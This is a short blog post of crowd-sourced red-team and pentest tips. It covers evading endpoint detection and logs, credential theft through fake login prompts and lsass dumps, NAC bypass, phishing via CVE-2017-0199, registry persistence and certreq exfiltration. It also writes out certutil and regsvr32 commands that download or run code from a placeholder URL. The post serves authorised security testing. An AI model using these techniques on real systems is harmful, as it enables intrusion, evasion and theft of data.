synack.blog


I am collecting/writing redteam and pentest tips. Please send yours with comment and i will add it quickly. Also feedback is welcomed.
  1. You can use high reputation redirectors like Google or AWS in c&c communications to bypass reputation based whitelists. @1ce7ea redteam
  2. Use cleanwipe for uninstalling Sep. It doesn't require Administrator privileges. @dimakoci_ redteam windows
  3. Scan all local network IP ranges(192.168,172.16,10.0) instead of the scope given. You can find the forgotten networks or hosts. @kayhankayihan pentest
  4. Use net user /dom instead of net user /domain. Second one may be being watch by endpoint solution. @vysecurity redteam pentest windows
  5. Use wmiexec instead of psexec. It makes less noise. redteam pentest windows
  6. If you need put a file on disk, use Alternate Data Streams. @Oddvarmoe redteam windows
  7. If you have low priv shell, use fake login prompt for credentials. @enigma0x3 redteam windows
  8. If you need plaintext credentials and you don't want to use mimikatz. Dump lsass and parse it in local. redteam windows
  9. Avoid wtmp logging with ssh -l username target -T. @pwnagelabs redteam linux
  10. Use kill -9 $$ for avoiding bash history on exit. @pwnagelabs redteam linux
  11. If you have a connection but NAC is blocking you. Listen to broadcasts and collect mac address. And use printer's macs for NAC bypass. redteam pentest
  12. Scan external network with Nessus, Netsparker etc. or make little DoS/DDoS attacks to hide real action from blue team. @corpuscallosum redteam
  13. Use ROPEMAKER method and CVE-2017-0199 for creating phishing mails. redteam
  14. You can download any files with signed certutil.exe like this:
    certutil -urlcache -split -f <url> <out_filename> redteam pentest windows
  15. You can run your dlls like this:
    regsrv32 /s /u dll_name redteam pentest windows
  16. You can run scripts remotely with regsvr32.exe like this:
    regsvr32 /s /n /u /i:<url> scrobj.dll @subTee redteam pentest windows
  17. Use smtp relay for internal phishing. redteam
  18. You can encrypt your payloads/macros with using target company domain name as key. redteam pentest windows
  19. You can use HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ with Debugger value for persistence. redteam windows
  20. You must tune connection limit when using automatic vulnerability scanners for avoiding network dropouts. @Kayranfatih pentest
  21. You can use Windows's certreq.exe for data exfiltration. @doylersec redteam windows

Bye